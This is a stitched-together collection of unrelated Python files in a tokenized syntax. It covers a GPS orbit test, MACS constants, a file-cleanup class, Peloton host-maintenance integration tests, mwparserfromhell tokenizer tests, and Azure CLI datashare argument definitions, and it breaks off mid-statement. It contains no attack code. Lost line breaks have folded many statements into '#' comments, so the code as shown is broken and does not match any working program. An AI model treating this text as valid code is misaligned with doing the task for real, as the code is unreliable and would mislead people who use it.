self<block_start>dog_orbit=AstroDog(pull_orbit=<true>)<line_sep>dog_nav=AstroDog(pull_orbit=<false>)<for_stmt>gps_time gps_times<block_start><for_stmt>svId svIds<block_start>sat_info_nav=dog_nav.get_sat_info(svId gps_time)<line_sep>sat_info_orbit=dog_orbit.get_sat_info(svId gps_time)<line_sep>np.testing.assert_allclose(sat_info_nav[0] sat_info_orbit[0] rtol=0 atol=5)<line_sep>np.testing.assert_allclose(sat_info_nav[1] sat_info_orbit[1] rtol=0 atol=.1)<line_sep>np.testing.assert_allclose(sat_info_nav[2] sat_info_orbit[2] rtol=0 atol=1e-7)<line_sep>np.testing.assert_allclose(sat_info_nav[3] sat_info_orbit[3] rtol=0 atol=1e-11)<block_end><block_end><block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
MACS_VERSION="3.0.0a7"<line_sep>MAX_PAIRNUM=1000<line_sep>MAX_LAMBDA=100000<line_sep>FESTEP=20<line_sep>BUFFER_SIZE=100000# np array will increase at step of 1 million items READ_BUFFER_SIZE=10000000# 10M bytes for read buffer size N_MP=2# Number of processers
<import_stmt>common.database<as>db<import_stmt>common.util.urlFuncs<as>urlFuncs<import_stmt>logging<import_stmt>os.path<import_stmt>settings<class_stmt>Clean(object)<block_start><def_stmt>__init__ self<block_start>print("Clean __init__()")<line_sep>self.log=logging.getLogger("Main.Cleaner")<line_sep>super().__init__()<block_end><def_stmt>clean_files self<block_start><with_stmt>db.session_context()<as>sess<block_start>q=sess.query(db.WebFiles).filter(db.WebFiles.fspath<ne><none>)<line_sep>self.log.info("Querying for non-null filepaths...")<line_sep>have=q.all()<line_sep>self.log.info("Have %s local files." len(have))<line_sep>count=0<for_stmt>file have<block_start>fpath=os.path.join(settings.RESOURCE_DIR file.fspath)<if_stmt><not>os.path.exists(fpath)<block_start>self.log.error("Missing file: %s" fpath)<block_end>count<augadd>1<if_stmt>count%1000<eq>0<block_start>self.log.info("Scanned %s files." count)<block_end><block_end><block_end><block_end><block_end>
<import_stmt>logging<import_stmt>pytest<import_stmt>time<import_from_stmt>tests.integration.host get_host_in_state wait_for_host_state is_host_in_state draining_period_sec <import_from_stmt>peloton_client.pbgen.peloton.api.v0.host host_pb2<as>hpb<import_from_stmt>peloton_client.pbgen.peloton.api.v0.task task_pb2<as>task<line_sep>pytestmark=[pytest.mark.default pytest.mark.preemption pytest.mark.random_order(disabled=<true>) ]<line_sep>log=logging.getLogger(__name__)<line_sep># Tests task kill due to host maintenance with the following scenario # 1. Create a job (with 4 instances) with host affinity constraint (say host A) # All 4 instances should transition to RUNNING # 2. Start Peloton host maintenance on the host A: # The host draining kicks in and the tasks on host A should be killed in # the next host draining cycle. The tasks should transition to PENDING as # host A is DRAINING and there should be no further scheduling on it. <def_stmt>test__start_maintenance_kill_tasks host_affinity_job maintenance# Pick a host that is UP and start maintenance on it <block_start>test_host=get_host_in_state(hpb.HOST_STATE_UP)<line_sep># Set host affinity of the job to the selected host host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value=(test_host)<line_sep>host_affinity_job.create()<line_sep>host_affinity_job.wait_for_state(goal_state="RUNNING")<def_stmt>all_running <block_start><return>all(t.state<eq>task.RUNNING<for>t host_affinity_job.get_tasks().values())<block_end>host_affinity_job.wait_for_condition(all_running)<line_sep>constraint=host_affinity_job.job_config.defaultConfig.constraint<line_sep>test_host=constraint.labelConstraint.label.value<line_sep>resp=maintenance["start"]([test_host])<assert_stmt>resp<def_stmt>all_pending <block_start><return>all(t.state<eq>task.PENDING<for>t host_affinity_job.get_tasks().values())<block_end># Wait for tasks to be killed and restarted host_affinity_job.wait_for_condition(all_pending)<block_end># Tests a typical host lifecycle. The scenario is as follows # 1. Select a host in UP state. # 2. Start Peloton host maintenance on host A: # a. Host A should immediately transition to DRAINING. # b. Host A should transition to DOWN, latest in the next host draining # cycle. # 3. Complete Maintenance on host A: # Host A should not longer be DOWN. It should transition to UP <def_stmt>test__host_maintenance_lifecycle host_affinity_job maintenance# Pick a host that is UP and start maintenance on it <block_start>test_host=get_host_in_state(hpb.HOST_STATE_UP)<line_sep># Set host affinity of the job to the selected host host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value=(test_host)<line_sep>host_affinity_job.create()<line_sep># Start maintenance on the selected host resp=maintenance["start"]([test_host])<assert_stmt>resp<line_sep># Wait for host to transition to DOWN wait_for_host_state(test_host hpb.HOST_STATE_DOWN)<line_sep># Complete maintenance on the test hosts resp=maintenance["stop"]([test_host])<assert_stmt>resp<line_sep># Host should no longer be DOWN <assert_stmt><not>is_host_in_state(test_host hpb.HOST_STATE_DOWN)<line_sep>wait_for_host_state(test_host hpb.HOST_STATE_UP)<block_end># Tests the resumption of draining process on resmgr recovery. The scenario is # as follows: # 1. Select a host in UP state: # 2. Start Peloton host maintenance on host A. # 3. Restart resmgr: Before restarting resmgr, jobmgr is stopped to ensure # preemption queue is not polled. On resmgr recovery, the # draining process should resume and host should transition # to DOWN <def_stmt>test__host_draining_resumes_on_resmgr_recovery host_affinity_job maintenance jobmgr resmgr # Pick a host that is UP and start maintenance on it <block_start>test_host=get_host_in_state(hpb.HOST_STATE_UP)<line_sep># Set host affinity of the job to the selected host host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value=(test_host)<line_sep>host_affinity_job.create()<def_stmt>all_running <block_start><return>all(t.state<eq>task.RUNNING<for>t host_affinity_job.get_tasks().values())<block_end>host_affinity_job.wait_for_condition(all_running)<line_sep>constraint=host_affinity_job.job_config.defaultConfig.constraint<line_sep>test_host=constraint.labelConstraint.label.value<line_sep>resp=maintenance["start"]([test_host])<assert_stmt>resp<line_sep># Stop jobmgr to ensure tasks are not killed jobmgr.stop()<line_sep># Sleep for one draining period to ensure maintenance queue is polled time.sleep(draining_period_sec)<line_sep>resmgr.restart()<line_sep>jobmgr.start()<line_sep># Wait for host to transition to DOWN wait_for_host_state(test_host hpb.HOST_STATE_DOWN)<block_end># Tests the resumption of draining process on resmgr recovery. The scenario is # as follows: # 1. Select a host in UP state: # 2. Start Peloton host maintenance on host A. # 3. Restart hostmgr: Before restarting hostmgr, resmgr is stopped to ensure # maintenance queue is not polled. On hostmgr recovery, the # draining process should resume and host should transition # to DOWN <def_stmt>test__host_draining_resumes_on_hostmgr_recovery host_affinity_job maintenance resmgr hostmgr # Pick a host that is UP and start maintenance on it <block_start>test_host=get_host_in_state(hpb.HOST_STATE_UP)<line_sep># Set host affinity of the job to the selected host host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value=(test_host)<line_sep>host_affinity_job.create()<def_stmt>all_running <block_start><return>all(t.state<eq>task.RUNNING<for>t host_affinity_job.get_tasks().values())<block_end>host_affinity_job.wait_for_condition(all_running)<line_sep>constraint=host_affinity_job.job_config.defaultConfig.constraint<line_sep>test_host=constraint.labelConstraint.label.value<line_sep># Stop resmgr to ensure maintenance queue is not polled resmgr.stop()<line_sep>resp=maintenance["start"]([test_host])<assert_stmt>resp<line_sep>hostmgr.restart()<line_sep>resmgr.start()<line_sep># Wait for host to transition to DOWN wait_for_host_state(test_host hpb.HOST_STATE_DOWN)<block_end>
# Copyright (C) 2012-2016 <NAME> <<EMAIL>> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. <import_stmt>codecs<import_from_stmt>os listdir path<import_stmt>warnings<import_stmt>pytest<import_from_stmt>mwparserfromhell.parser contexts tokens<import_from_stmt>mwparserfromhell.parser.builder Builder<import_from_stmt>mwparserfromhell.parser.tokenizer Tokenizer<as>PyTokenizer<try_stmt><block_start><import_from_stmt>mwparserfromhell.parser._tokenizer CTokenizer<block_end><except_stmt>ImportError<block_start>CTokenizer=<none><block_end><class_stmt>_TestParseError(Exception)<block_start>"""Raised internally when a test could not be parsed."""<block_end><def_stmt>_parse_test test data<block_start>"""Parse an individual *test*, storing its info in *data*."""<for_stmt>line test.strip().splitlines()<block_start><if_stmt>line.startswith("name:")<block_start>data["name"]=line[len("name:"):].strip()<block_end><elif_stmt>line.startswith("label:")<block_start>data["label"]=line[len("label:"):].strip()<block_end><elif_stmt>line.startswith("input:")<block_start>raw=line[len("input:"):].strip()<if_stmt>raw[0]<eq>'"'<and>raw[-1]<eq>'"'<block_start>raw=raw[1:-1]<block_end>raw=raw.encode("raw_unicode_escape")<line_sep>data["input"]=raw.decode("unicode_escape")<block_end><elif_stmt>line.startswith("output:")<block_start>raw=line[len("output:"):].strip()<try_stmt><block_start>data["output"]=eval(raw vars(tokens))<block_end><except_stmt>Exception<as>err<block_start><raise>_TestParseError(err)<from>err<block_end><block_end><block_end><block_end><def_stmt>_load_tests filename name text<block_start>"""Load all tests in *text* from the file *filename*."""<line_sep>tests=text.split("\n---\n")<for_stmt>test tests<block_start>data={"name":<none> "label":<none> "input":<none> "output":<none>}<try_stmt><block_start>_parse_test(test data)<block_end><except_stmt>_TestParseError<as>err<block_start><if_stmt>data["name"]<block_start>error="Could not parse test '{0}' in '{1}':\n\t{2}"<line_sep>warnings.warn(error.format(data["name"] filename err))<block_end><else_stmt><block_start>error="Could not parse a test in '{0}':\n\t{1}"<line_sep>warnings.warn(error.format(filename err))<block_end><continue><block_end><if_stmt><not>data["name"]<block_start>error="A test in '{0}' was ignored because it lacked a name"<line_sep>warnings.warn(error.format(filename))<line_sep><continue><block_end><if_stmt>data["input"]<is><none><or>data["output"]<is><none><block_start>error=("Test '{}' in '{}' was ignored because it lacked an input or an output")<line_sep>warnings.warn(error.format(data["name"] filename))<line_sep><continue><block_end># Include test filename in name data["name"]="{}:{}".format(name data["name"])<line_sep><yield>data<block_end><block_end><def_stmt>build <block_start>"""Load and install all tests from the 'tokenizer' directory."""<line_sep>directory=path.join(path.dirname(__file__) "tokenizer")<line_sep>extension=".mwtest"<for_stmt>filename listdir(directory)<block_start><if_stmt><not>filename.endswith(extension)<block_start><continue><block_end>fullname=path.join(directory filename)<with_stmt>codecs.open(fullname "r" encoding="utf8")<as>fp<block_start>text=fp.read()<line_sep>name=path.split(fullname)[1][:-len(extension)]<line_sep><yield><from>_load_tests(fullname name text)<block_end><block_end><block_end>@pytest.mark.parametrize("tokenizer" filter(<none> (CTokenizer PyTokenizer)) ids=<lambda>t:"CTokenizer"<if>t.USES_C<else>"PyTokenizer" )@pytest.mark.parametrize("data" build() ids=<lambda>data:data["name"])<def_stmt>test_tokenizer tokenizer data<block_start>expected=data["output"]<line_sep>actual=tokenizer().tokenize(data["input"])<assert_stmt>expected<eq>actual<block_end>@pytest.mark.parametrize("data" build() ids=<lambda>data:data["name"])<def_stmt>test_roundtrip data<block_start>expected=data["input"]<line_sep>actual=str(Builder().build(data["output"][:]))<assert_stmt>expected<eq>actual<block_end>@pytest.mark.skipif(CTokenizer<is><none> reason="CTokenizer not available")<def_stmt>test_c_tokenizer_uses_c <block_start>"""make sure the C tokenizer identifies as using a C extension"""<assert_stmt>CTokenizer.USES_C<is><true><assert_stmt>CTokenizer().USES_C<is><true><block_end><def_stmt>test_describe_context <block_start><assert_stmt>""<eq>contexts.describe(0)<line_sep>ctx=contexts.describe(contexts.TEMPLATE_PARAM_KEY|contexts.HAS_TEXT)<assert_stmt>"TEMPLATE_PARAM_KEY|HAS_TEXT"<eq>ctx<block_end>
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- # pylint: disable=line-too-long # pylint: disable=too-many-lines # pylint: disable=too-many-statements # pylint: disable=unused-import <import_from_stmt>knack.arguments CLIArgumentType<import_from_stmt>azure.cli.core.commands.parameters tags_type get_enum_type resource_group_name_type get_location_type get_datetime_type <import_from_stmt>azure.cli.core.commands.validators get_default_location_from_resource_group validate_file_or_dict<import_from_stmt>azext_datashare.vendored_sdks.datashare.models._data_share_management_client_enums ShareKind Kind SynchronizationMode SynchronizationKind RecurrenceInterval<import_from_stmt>azext_datashare.manual._validators invitation_id_validator<def_stmt>load_arguments self _<block_start><with_stmt>self.argument_context('datashare account list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)<block_end># modified <with_stmt>self.argument_context('datashare account show')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' options_list=['--name' '-n'] id_part='name' help='The name of the share account.')<block_end># modified <with_stmt>self.argument_context('datashare account create')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' options_list=['--name' '-n'] help='The name of the share account.')# modified c.argument('location' arg_type=get_location_type(self.cli_ctx) validator=get_default_location_from_resource_group)# modified c.argument('tags' tags_type)# modified c.ignore('identity')<block_end># Only system assigned identity is supported, we can omit this option <with_stmt>self.argument_context('datashare account update')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' options_list=['--name' '-n'] id_part='name' help='The name of the share account.')# modified c.argument('tags' tags_type)<block_end># modified <with_stmt>self.argument_context('datashare account delete')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' options_list=['--name' '-n'] id_part='name' help='The name of the share account.')<block_end><with_stmt>self.argument_context('datashare account wait')<as>c<block_start>c.argument('account_name' options_list=['--name' '-n'] id_part='name' help='The name of the share account.')<block_end># modified <with_stmt>self.argument_context('datashare list')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<block_end><with_stmt>self.argument_context('datashare show')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' options_list=['--name' '-n'] id_part='child_name_1' help='The name of the share.')<block_end># modified <with_stmt>self.argument_context('datashare create')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' options_list=['--name' '-n'] help='The name of the share.')# modified c.argument('description' help='Share description.')# modified c.argument('share_kind' arg_type=get_enum_type(ShareKind) help='Share kind.')# modified c.argument('terms' help='Share terms.')<block_end># modified <with_stmt>self.argument_context('datashare delete')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' options_list=['--name' '-n'] id_part='child_name_1' help='The name of the share.')<block_end># modified <with_stmt>self.argument_context('datashare wait')<as>c<block_start>c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' options_list=['--name' '-n'] id_part='child_name_1' help='The name of the share.')<block_end># modified <with_stmt>self.argument_context('datashare dataset list')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<block_end><with_stmt>self.argument_context('datashare dataset show')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('data_set_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the dataset.')<block_end># modified <with_stmt>self.argument_context('datashare dataset create')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<line_sep>c.argument('data_set_name' options_list=['--name' '-n'] help='The name of the dataset.')# modified c.argument('data_set' options_list=['--dataset'] type=validate_file_or_dict help='Dataset parameters in JSON string or path to JSON file.')<block_end># modified <with_stmt>self.argument_context('datashare dataset delete')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('data_set_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the dataset.')<block_end># modified <with_stmt>self.argument_context('datashare dataset wait')<as>c<block_start>c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('data_set_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the dataset.')<block_end># modified <with_stmt>self.argument_context('datashare invitation list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<block_end><with_stmt>self.argument_context('datashare invitation show')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('invitation_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the invitation.')<block_end># modified <with_stmt>self.argument_context('datashare invitation create')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<line_sep>c.argument('invitation_name' options_list=['--name' '-n'] help='The name of the invitation.')# modified c.argument('target_active_directory_id' help='The target Azure AD Id. Can\'t be combined with email.')# modified c.argument('target_email' help='The email the invitation is directed to.')# modified c.argument('target_object_id' help='The target user or application Id that invitation is being sent to. Must be specified along TargetActiveDirectoryId. This enables sending invitations to specific users or applications in an AD tenant.')<block_end># modified <with_stmt>self.argument_context('datashare invitation delete')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('invitation_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the invitation.')<block_end># modified <with_stmt>self.argument_context('datashare synchronization-setting list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<block_end><with_stmt>self.argument_context('datashare synchronization-setting show')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('synchronization_setting_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the synchronizationSetting.')<block_end># modified <with_stmt>self.argument_context('datashare synchronization-setting create')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<line_sep>c.argument('synchronization_setting_name' options_list=['--name' '-n'] help='The name of the synchronizationSetting.')# modified c.argument('recurrence_interval' arg_type=get_enum_type(RecurrenceInterval) arg_group='Synchronization Setting' help='Synchronization Recurrence Interval.')<line_sep>c.argument('synchronization_time' arg_group='Synchronization Setting' arg_type=get_datetime_type(help='Synchronization time.'))<line_sep>c.argument('kind' arg_type=get_enum_type(SynchronizationKind) arg_group='Synchronization Setting' default='ScheduleBased' help='Kind of synchronization.')<block_end><with_stmt>self.argument_context('datashare synchronization-setting delete')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('synchronization_setting_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the synchronizationSetting.')<block_end># modified <with_stmt>self.argument_context('datashare synchronization-setting wait')<as>c<block_start>c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('synchronization_setting_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the synchronizationSetting.')<block_end># modified <with_stmt>self.argument_context('datashare synchronization list-detail')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')# modified c.argument('share_name' help='The name of the share.')# modified c.argument('synchronization_id' help='The synchronization GUID.')<block_end><with_stmt>self.argument_context('datashare synchronization list')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')# modified c.argument('share_name' help='The name of the share.')<block_end># modified <with_stmt>self.argument_context('datashare provider-share-subscription list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_name' help='The name of the share.')<block_end><with_stmt>self.argument_context('datashare provider-share-subscription show')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('provider_share_subscription_id' options_list=['--share-subscription'] id_part='child_name_2' help='To locate share subscription')<block_end># modified TODO validator <with_stmt>self.argument_context('datashare provider-share-subscription revoke')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('provider_share_subscription_id' options_list=['--share-subscription'] id_part='child_name_2' help='To locate share subscription')<block_end># modified <with_stmt>self.argument_context('datashare provider-share-subscription reinstate')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('provider_share_subscription_id' options_list=['--share-subscription'] id_part='child_name_2' help='To locate share subscription')<block_end># modified <with_stmt>self.argument_context('datashare provider-share-subscription wait')<as>c<block_start>c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_name' id_part='child_name_1' help='The name of the share.')# modified c.argument('provider_share_subscription_id' options_list=['--share-subscription'] id_part='child_name_2' help='To locate share subscription')<block_end># modified <with_stmt>self.argument_context('datashare consumer invitation list')<as>c<block_start><pass><block_end><with_stmt>self.argument_context('datashare consumer invitation show')<as>c<block_start>c.argument('location' arg_type=get_location_type(self.cli_ctx))# modified c.argument('invitation_id' validator=invitation_id_validator help='An invitation id')<block_end><with_stmt>self.argument_context('datashare consumer invitation reject')<as>c<block_start>c.argument('location' arg_type=get_location_type(self.cli_ctx))# modified c.argument('invitation_id' validator=invitation_id_validator help='An invitation id')<block_end># modified <with_stmt>self.argument_context('datashare consumer share-subscription list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<block_end><with_stmt>self.argument_context('datashare consumer share-subscription show')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_subscription_name' options_list=['--name' '-n'] id_part='child_name_1' help='The name of the share subscription.')<block_end># modified <with_stmt>self.argument_context('datashare consumer share-subscription create')<as>c<block_start><import_from_stmt>azure.cli.core.commands.parameters get_location_name_type get_location_completion_list<line_sep>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' options_list=['--name' '-n'] help='The name of the share subscription.')# modified c.argument('invitation_id' validator=invitation_id_validator help='The invitation id.')# modified c.argument('source_share_location' type=get_location_name_type(self.cli_ctx) help='Source share location.' completer=get_location_completion_list)<block_end># modified <with_stmt>self.argument_context('datashare consumer share-subscription delete')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_subscription_name' options_list=['--name' '-n'] id_part='child_name_1' help='The name of the share subscription.')<block_end># modified <with_stmt>self.argument_context('datashare consumer share-subscription list-source-share-synchronization-setting')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<block_end><with_stmt>self.argument_context('datashare consumer share-subscription list-source-dataset')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<block_end><with_stmt>self.argument_context('datashare consumer share-subscription wait')<as>c<block_start>c.argument('account_name' id_part='name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' options_list=['--name' '-n'] id_part='child_name_1' help='The name of the share subscription.')<block_end># modified <with_stmt>self.argument_context('datashare consumer share-subscription synchronization start')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<line_sep>c.argument('synchronization_mode' arg_type=get_enum_type(SynchronizationMode) help='Synchronization mode')<block_end># modified <with_stmt>self.argument_context('datashare consumer share-subscription synchronization cancel')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<line_sep>c.argument('synchronization_id' help='The synchronization GUID')<block_end><with_stmt>self.argument_context('datashare consumer share-subscription synchronization wait')<as>c<block_start>c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<line_sep>c.argument('synchronization_id' help='The synchronization GUID')<block_end><with_stmt>self.argument_context('datashare consumer share-subscription synchronization list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<block_end><with_stmt>self.argument_context('datashare consumer share-subscription synchronization list-detail')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<line_sep>c.argument('synchronization_id' help='Synchronization id')<block_end><with_stmt>self.argument_context('datashare consumer dataset-mapping list')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<block_end><with_stmt>self.argument_context('datashare consumer dataset-mapping show')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' id_part='child_name_1' help='The name of the share subscription.')<line_sep>c.argument('data_set_mapping_name' id_part='child_name_2' options_list=['--name' '-n'] help='The name of the datasetMapping.')<block_end># modified <with_stmt>self.argument_context('datashare consumer dataset-mapping create')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<line_sep>c.argument('data_set_mapping_name' options_list=['--name' '-n'] help='The name of the datasetMapping.')# modified c.argument('data_set_mapping' options_list=['--mapping'] type=validate_file_or_dict help='Dataset mapping in JSON string or path to JSON file.')<block_end># modified <with_stmt>self.argument_context('datashare consumer dataset-mapping delete')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' id_part='child_name_1' help='The name of the share subscription.')<line_sep>c.argument('data_set_mapping_name' id_part='child_name_2' options_list=['--name' '-n'] help='The name of the datasetMapping.')<block_end># modified <with_stmt>self.argument_context('datashare consumer dataset-mapping wait')<as>c<block_start>c.argument('account_name' id_part='name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' id_part='child_name_1' help='The name of the share subscription.')<line_sep>c.argument('data_set_mapping_name' id_part='child_name_2' options_list=['--name' '-n'] help='The name of the datasetMapping.')<block_end># modified <with_stmt>self.argument_context('datashare consumer trigger list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<block_end><with_stmt>self.argument_context('datashare consumer trigger show')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' id_part='child_name_1' help='The name of the share subscription.')<line_sep>c.argument('trigger_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the trigger.')<block_end><with_stmt>self.argument_context('datashare consumer trigger create')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<line_sep>c.argument('trigger_name' options_list=['--name' '-n'] help='The name of the trigger.')# modified c.argument('recurrence_interval' arg_type=get_enum_type(RecurrenceInterval) arg_group='Synchronization Setting' help='Synchronization Recurrence Interval.')<line_sep>c.argument('synchronization_time' arg_group='Synchronization Setting' arg_type=get_datetime_type(help='Synchronization time.'))<line_sep>c.argument('kind' arg_type=get_enum_type(SynchronizationKind) arg_group='Synchronization Setting' default='ScheduleBased' help='Kind of synchronization.')<block_end><with_stmt>self.argument_context('datashare consumer trigger delete')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_subscription_name' id_part='child_name_1' help='The name of the share subscription.')# modified c.argument('trigger_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the trigger.')<block_end># modified <with_stmt>self.argument_context('datashare consumer trigger 